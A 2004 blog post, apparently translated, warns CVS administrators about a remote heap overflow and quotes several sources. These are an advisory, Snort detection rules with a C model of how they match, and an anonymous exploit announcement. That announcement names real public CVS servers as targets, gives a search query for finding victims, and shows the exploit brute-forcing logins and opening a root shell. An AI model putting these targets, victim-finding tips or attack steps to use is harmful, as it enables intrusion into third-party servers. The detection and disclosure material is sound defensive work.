

May 28, 2004

[URGENT WARNING] CVS administrators

Copyright notice: this article may be freely reposted; when reposting, please cite the original source and author with a hyperlink and include this notice.
https://windtear.net/archives/2004/05/28/000296.html

Some progress on my thesis, so I am slowly getting my online time back.

Just two weeks offline, and a CVS vulnerability blows up.

The scary part is that they already had a working exploit for it three years ago.

That is not playing fair.

Back to the point.

CVS administrators, take note: if you have not upgraded your CVS server yet, upgrade it now.

This mainly concerns anyone running cvs with a publicly reachable CVS repository.

I have not studied it closely; I just compiled the exploit and tried it. Against an ordinary CVS server it can execute arbitrary commands directly with the privileges the server runs under.

http://groups.msn.com/FISHGroups

Welcome to FISH Groups !!!

Welcome to FISHGroup's msn group!
You can download these released exploits.
And you can upload your private exploits.
Or improve the released exploits to work on Korean/Japanese/Chinese Simplified/Chinese Traditional/French/Russian/German language OS etc.
We'll check your exploits.

Try your best!
Thanks.
FISHGroup
2004.4.28

05.20.CVS_Remote_Entry_Line_Heap_Overflow_Root_Exploit_(Linux_FreeBSD_Solaris)-FISH

stable CVS releases up to 1.11.15 and CVS feature releases up to 1.12.7 are exploitable

----->

/*Date: 20 May 2004 01:19:15 -0000
From: anonymous
Subject: Declaring Open Season on Open Source

Hi, consider this an iALERT

Today a nice vulnerability in the CVS was published, this sucks.
Here are some exploits for that vulnerability.
They will exploit any Linux / FreeBSD / Solaris box running CVS.
(The Solaris one is very slow, you're bitching, I'd like to see you write it.)

We already owned everyone and everything with these exploits years ago, and in
fact we've all had them sitting on the shelf gathering dust due to lack of
new targets.

FUN TESTBED IDEAS:
cvs.apache.org
cvs.perl.com
cvshome.org <-- PLAY "FIND THE SUCKIT"
anoncvs.freebsd.org <-- ls -al /tmp to see how many people who can't hack own
this already
cvs.kernel.org
*.gnu.org
*.debian.org
www.openbsd.org <-- TRIPLE HEAP SOLARIS OWNAGE - THEO IS TOAST

HOW TO FIND VICTIMS:
google for "[anon/cvs/anonymous/etc] pserver"

.gov and .mil cvs trees are fun

I wonder how long it'll take everyone to remove all the SUCKits

Prizes may be given for the most imaginative defacement / trojaning.

Finally a big thank-you to Steffen Esser of Team TESO Security for being such an
amazing whitehat and providing the public with such great Security Product.

- The Axis of Eliteness - WARNING - THE AXIS HAZ ACCESS
"Move over saddam, cos you're not as leet as I am"
/* Linux / FreeBSD CVS exploit - January 2001 */

------ source ... -------

% gcc -lz ...

% ./cvs_exploit
Ac1dB1tCh3z (C)VS linux/*BSD pserver
Us4g3 : r34d 7h3 c0d3 d00d ;P

% ./cvs_exploit -h 127.0.0.1 -r /opt/cvsroot
Ac1dB1tCh3z (C)VS linux/*BSD pserver
Bruteforcing cvs login...
Trying cvsroot = /opt/cvsroot, login = anonymous      WRONG !
Trying cvsroot = /opt/cvsroot, login = anoncvs  WRONG !
Trying cvsroot = /opt/cvsroot, login = cvsread  WRONG !
Trying cvsroot = /opt/cvsroot, login = anon  WRONG !
Trying cvsroot = /opt/cvsroot, login = cvs WRONG !
Trying cvsroot = /opt/cvsroot, login = guest WRONG !
Trying cvsroot = /opt/cvsroot, login = reader   WRONG !
Trying cvsroot = /opt/cvsroot, login = cvslogin WRONG !
Trying cvsroot = /opt/cvsroot, login = anon-cvs WRONG !
unable to found a valid username

% ./cvs_exploit -h 127.0.0.2 -r /opt/cvsroot
Ac1dB1tCh3z (C)VS linux/*BSD pserver
Bruteforcing cvs login...
Trying cvsroot = /opt/cvsroot, login = anonymous      WRONG !
Trying cvsroot = /opt/cvsroot, login = anoncvs  WRONG !
Trying cvsroot = /opt/cvsroot, login = cvsread  WRONG !
Trying cvsroot = /opt/cvsroot, login = anon  WRONG !
Trying cvsroot = /opt/cvsroot, login = cvs FOUND !
Trying cvsroot = /opt/cvsroot, login = guest WRONG !
Trying cvsroot = /opt/cvsroot, login = reader   WRONG !
Trying cvsroot = /opt/cvsroot, login = cvslogin WRONG !
Trying cvsroot = /opt/cvsroot, login = anon-cvs WRONG !
Bruteforcing cvs password...
Trying login = cvs, pass =      WRONG !
Trying login = cvs, pass =      WRONG !
Trying login = cvs, pass = anonymous WRONG !
Trying login = cvs, pass = anoncvs   WRONG !
Trying login = cvs, pass = anon WRONG !
Trying login = cvs, pass = cvs  WRONG !
Trying login = cvs, pass = guest     WRONG !
unable to found a valid password

% ./cvs_exploit -h 127.0.0.1 -r /opt/cvsroot -u _test_
Ac1dB1tCh3z (C)VS linux/*BSD pserver
Bruteforcing cvs password...
Trying login = _test_, pass =   WRONG !
Trying login = _test_, pass =   WRONG !
Trying login = _test_, pass = anonymous WRONG !
Trying login = _test_, pass = anoncvs   WRONG !
Trying login = _test_, pass = anon   WRONG !
Trying login = _test_, pass = cvs    WRONG !
Trying login = _test_, pass = guest  WRONG !
unable to found a valid password

% ./cvs_exploit -h 127.0.0.1 -r /opt/cvsroot -u _test_ -p justtest
Ac1dB1tCh3z (C)VS linux/*BSD pserver
Exploiting 127.0.0.1 on a Linux [################### ]
        @#!@SUCCESS#@!#

RM -RF /tmp/cvs-serv28130
---YOU ARE IN BRO : cvs---
  7:05pm  up 39 days,  9:52,  3 users,  load average: 0.28, 0.06, 0.02
USER     TTY      FROM              LOGIN@   IDLE   JCPU   PCPU  WHAT
root     pts/1    192.168.1.207:S. 20May04  0.00s  0.83s  0.60s  ./cvs_exploit -h 127.0.
root     pts/2    192.168.1.207:S. 20May04  5days  0.15s  0.15s  /bin/bash
root     pts/3    192.168.1.207:S. 20May04  6:16m  0.26s  0.26s  /bin/bash

% ./cvs_exploit -h 127.0.0.3 -r /home/cvs -u _test_ -p justtest
Ac1dB1tCh3z (C)VS linux/*BSD pserver
Exploiting 127.0.0.3 on a Linux  [################### ]   WRONG !
Exploiting 127.0.0.3 on a *BSD

----->

http://security.e-matters.de/advisories/072004.html

Advisory 07/2004
CVS remote vulnerability

Release Date:  2004/05/19
Author:        Stefan Esser [s.esser@ematters.de]
Application:   CVS feature release <= 1.12.7
               CVS stable release <= 1.11.15
Severity:      A vulnerability within CVS allows remote compromise of CVS servers.
Risk:          Critical
Reference:     http://security.e-matters.de/advisories/072004.html
Last Modified: 2004/05/19
 
Overview

Concurrent Versions System (CVS) is the dominant open-source version control software that allows developers to access the latest code using a network connection.

Stable CVS releases up to 1.11.15 and CVS feature releases up to 1.12.7 both contain a flaw when deciding if a CVS entry line should get a modified or unchanged flag attached. This results in a heap overflow which can be exploited to execute arbitrary code on the CVS server. This could allow a repository compromise.
 
 
Details

While auditing the CVS source a flaw within the handling of modified and unchanged flag insertion into entry lines was discovered.

When the client sends an entry line to the server, an additional byte is allocated to have enough space for later flagging the entry as modified or unchanged. In both cases the check whether such a flag is already attached is flawed. This allows inserting M or = chars into the middle of a user-supplied string, one at a time, for every call to one of these functions.

It should be obvious that already the second call can overflow the allocated buffer by shifting the part after the insertion point one char backward. If the alignment of the block is chosen wisely, this is already exploitable by malloc() off-by-one exploitation techniques. However, carefully crafted commands allow the functions to be called several times to overwrite even more bytes (although this is not really needed if you want to exploit this bug on e.g. glibc-based systems).
 
 
Proof of Concept

e-matters is not going to release an exploit for this vulnerability to the public.
 
Disclosure Timeline

02 May 2004 - CVS developers and vendor-sec were notified by email; Derek Robert Price replied nearly immediately that the issue is fixed
03 May 2004 - Pre-notification process of important repositories was started
11 May 2004 - Sourceforge discovered that the patch breaks compatibility with some pserver-protocol-violating versions of WinCVS/TortoiseCVS
12 May 2004 - Pre-notified repositories were warned about this problem with a more compatible patch
19 May 2004 - Coordinated Public Disclosure
 
CVE Information

The Common Vulnerabilities and Exposures project (cve.mitre.org) has assigned the name CAN-2004-0396 to this issue.
 
 
Recommendation

Recommended is an immediate update to the new version. Additionally you should consider running your CVS server chrooted over SSH instead of using the :pserver: method. You can find a tutorial how to setup such a server at

http://www.netsys.com/library/papers/chrooted-ssh-cvs-server.txt
 
  
GPG-Key


pub 1024D/3004C4BC 2004-05-17 e-matters GmbH - Securityteam
Key fingerprint = 3FFB 7C86 7BE8 6981 D1DA A71A 6F7D 572D 3004 C4BC
 
Copyright 2004 Stefan Esser. All rights reserved.

----->

The ISC Handlers George Bakos and Mike Poor put together some simple and very good snort rules to detect these cvs exploits. Take a look at ISC.

http://isc.sans.org/diary.php?date=2004-05-21

Best Regards.
Fabienni Gilles - Security Consultant
K-OTik Security Survey 24/7
http://www.k-otik.com


This just in from Mike Poor:

In response to seeing the cvs exploits being used in the wild, ISC Handlers George Bakos and Mike Poor put together some simple snort rules to detect the cvs exploits posted at K-Otik. Keep in mind that these are stopgap rules to catch these exploits only, not the vulnerability itself. The exploits are detected by Snort's SHELLCODE rules, but those rules are turned off by default. With the rules below, be sure to change the sids to match your local.rules numbering. NOTE: these rules will wrap, so eliminate the line feeds when adding them to your local.rules file.

alert tcp $EXTERNAL_NET any -> $HOME_NET 2401 (msg:"CVS server heap overflow attempt (target Linux)"; flow:to_server,established; content:"|45 6e 74 72 79 20 43 43 43 43 43 43 43 43 43 2f 43 43|"; offset:0; depth:20; dsize: >512; threshold: type limit, track by_dst, count 1, seconds 60 ; sid:1000000; rev:1; classtype:attempted-admin;)

alert tcp $EXTERNAL_NET any -> $HOME_NET 2401 (msg:"CVS server heap overflow attempt (target BSD)"; flow:to_server,established; content:"|45 6e 74 72 79 20 61 61 61 61 61 61 61 61 61 61 61 61|"; offset:0; depth:18; dsize: >512; threshold: type limit, track by_dst, count 1, seconds 60 ; sid:1000001; rev:1;classtype:attempted-admin;)

alert tcp $EXTERNAL_NET any -> $HOME_NET 2401 (msg:"CVS server heap overflow attempt (target Solaris)"; flow:to_server,established; content:"|41 72 67 75 6d 65 6e 74 20 62 62 62 62 62 62 62 62 62|";offset:0; depth:18; dsize: >512; threshold: type limit, track by_dst, count 1, seconds 60 ; sid:1000002; rev:1;classtype:attempted-admin;)

Deb Hale
Handler On Duty
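
Added example (my own code, not from ISC, K-OTik or Snort): a small C model of the content/offset/depth/dsize logic of the three rules above, run over constructed payloads, to show what the rules catch and to make the "stopgap, not the vulnerability" caveat concrete. The rule contents are the ASCII form of the hex strings in the rules; the payloads, the filler bytes and the 2048-byte buffer are constructed for this demo, and flow, threshold, sid and classtype are not modelled.

```c
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/* Model of the Snort options the three ISC rules rely on:
 *   dsize:>N       the whole TCP payload must be longer than N bytes
 *   content        byte string to look for
 *   offset/depth   search window: the content may start at `offset` and
 *                  must end within `depth` bytes of that offset
 * The rule table is transcribed from the |..| hex strings above. */
struct cvs_rule {
    const char *msg;
    const char *content;     /* plain bytes of the hex content */
    size_t      clen;
    size_t      offset;
    size_t      depth;
    size_t      min_dsize;   /* dsize: >min_dsize */
};

static const struct cvs_rule CVS_RULES[] = {
    { "CVS server heap overflow attempt (target Linux)",
      "Entry CCCCCCCCC/CC", 18, 0, 20, 512 },
    { "CVS server heap overflow attempt (target BSD)",
      "Entry aaaaaaaaaaaa", 18, 0, 18, 512 },
    { "CVS server heap overflow attempt (target Solaris)",
      "Argument bbbbbbbbb", 18, 0, 18, 512 },
};
#define NRULES (sizeof CVS_RULES / sizeof CVS_RULES[0])

/* 1 if rule r fires on payload p[0..n), else 0. */
static int rule_matches(const struct cvs_rule *r, const unsigned char *p, size_t n)
{
    if (n <= r->min_dsize) return 0;             /* dsize:>N            */
    size_t end = r->offset + r->depth;           /* exclusive search end */
    if (end > n) end = n;
    if (end < r->clen) return 0;
    for (size_t i = r->offset; i + r->clen <= end; i++)
        if (memcmp(p + i, r->content, r->clen) == 0)
            return 1;
    return 0;
}

/* Index of the first rule that fires on this payload, or -1. */
static int first_alert(const unsigned char *p, size_t n)
{
    for (size_t i = 0; i < NRULES; i++)
        if (rule_matches(&CVS_RULES[i], p, n)) return (int)i;
    return -1;
}

/* Build a constructed payload (`lead` followed by `fill` bytes up to
 * `total` bytes, capped at 2048) and run the rules over it. */
static int alert_for(const char *lead, unsigned char fill, size_t total)
{
    static unsigned char buf[2048];
    if (total > sizeof buf) total = sizeof buf;
    size_t n = strlen(lead);
    if (n > total) n = total;
    memcpy(buf, lead, n);
    memset(buf + n, fill, total - n);
    return first_alert(buf, total);
}

int main(void)
{
    /* constructed request that alternates the two flag commands for one
     * entry (the pattern behind CAN-2004-0396) but uses no exploit filler */
    const char *trigger = "Entry /foo.c/1.1///\nIs-modified foo.c\nUnchanged foo.c\n";
    printf("Linux exploit signature, 600 bytes : rule %d\n", alert_for("Entry CCCCCCCCC/CC", 'C', 600));
    printf("same signature, only 512 bytes     : rule %d\n", alert_for("Entry CCCCCCCCC/CC", 'C', 512));
    printf("two bytes before the signature     : rule %d\n", alert_for("xxEntry CCCCCCCCC/CC", 'C', 600));
    printf("Solaris exploit signature          : rule %d\n", alert_for("Argument bbbbbbbbb", 'b', 600));
    printf("flag-alternation request, no filler: rule %d\n", alert_for(trigger, 'Q', 600));
    return 0;
}
```

The last case is the caveat: a request that drives the flawed flag insertion with different padding, or with a different leading command, matches none of the three contents, so these rules flag the published exploit binaries rather than the bug. Also note the depth values: the Linux rule's depth of 20 tolerates two bytes before its 18-byte content, while the BSD and Solaris rules (depth 18) only fire when the content sits at offset 0.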

 

Posted by windtear at May 28, 2004 7:58 PM

For any problems using this site, please contact windtear @ windtear.net
Copyright© 1999-2024 Windtear. All rights reserved.